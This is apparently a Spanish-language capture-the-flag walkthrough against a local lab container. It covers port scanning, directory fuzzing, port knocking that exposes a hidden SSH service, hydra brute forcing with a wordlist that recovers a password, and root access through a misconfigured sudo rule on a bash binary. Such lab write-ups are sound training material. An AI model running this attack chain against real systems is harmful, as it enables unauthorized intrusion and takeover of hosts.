# Reconocimiento de puertos y servicios
nmap -Pn -n -sS -p- -sV --script vuln --min-rate 5000 -oN nmap 172.17.0.2

80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))

conseguimos el puerto 80 corriendo, asi que vamos y validamos el servicio web y es la plantilla de apache, inspeccionamos el codigo fuente
y no conseguimos nada asi que ahora hacemos fuzzing

gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 40 -x php,txt,html,py,sh,sql,js

===============================================================
/.php                 (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 10792]
/.html                (Status: 403) [Size: 275]
/qdefense.txt         (Status: 200) [Size: 111]
/.html                (Status: 403) [Size: 275]
/.php                 (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
Progress: 1661144 / 1661152 (100.00%)
===============================================================

interesante no? veamos ese txt!!!

------------------------------------------------------------


Recuerda llama antes de entrar , no seas como toctoc el maleducado
7000 8000 9000
busca y llama +54 2933574639

____________________________________________________________


nos conseguimos con lo que es posiblemente un usuario 'toctoc' y tenemos lo que parecen ser 3 puertos '7000 8000 9000'
asi que ahora vamos intentar atacar estos 3 puertos con PORT-KNOCKING ya que puede tratarse de que implementan esta tecnica 
para ocultar servicios que estan corriendo en otros puertos

git clone https://github.com/eliemoutran/KnockIt.git					| clonamos el repositorio con el script de PORT-KNOCKING

python3 knockit.py -b 172.17.0.2 7000 8000 9000						| comenzamos atacar los puertos
nmap -Pn -n -sS -p- -sV --script vuln --min-rate 5000 -oN nmap2 172.17.0.2		| volvemos a escanear puertos y servicios

22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))

en efecto habian ocultado el servicio ssh 

ahora aplicamos fuerza bruta al servicio ssh con lo que puede ser un usuario 'toctoc'

hydra -l toctoc -P /home/darks/Desktop/Kali/diccionarios/rockyou.txt ssh://172.17.0.2 -t 64


[22][ssh] host: 172.17.0.2   login: toctoc   password: kittycat	

ssh tocto@172.17.0.2							| estamos dentro
sudo -l

(ALL : NOPASSWD) /opt/bash
(ALL : NOPASSWD) /ahora/noesta/function

podemos abusar del binario bash asi que nos fuimos a 

sudo /opt/bash			| ya somos root
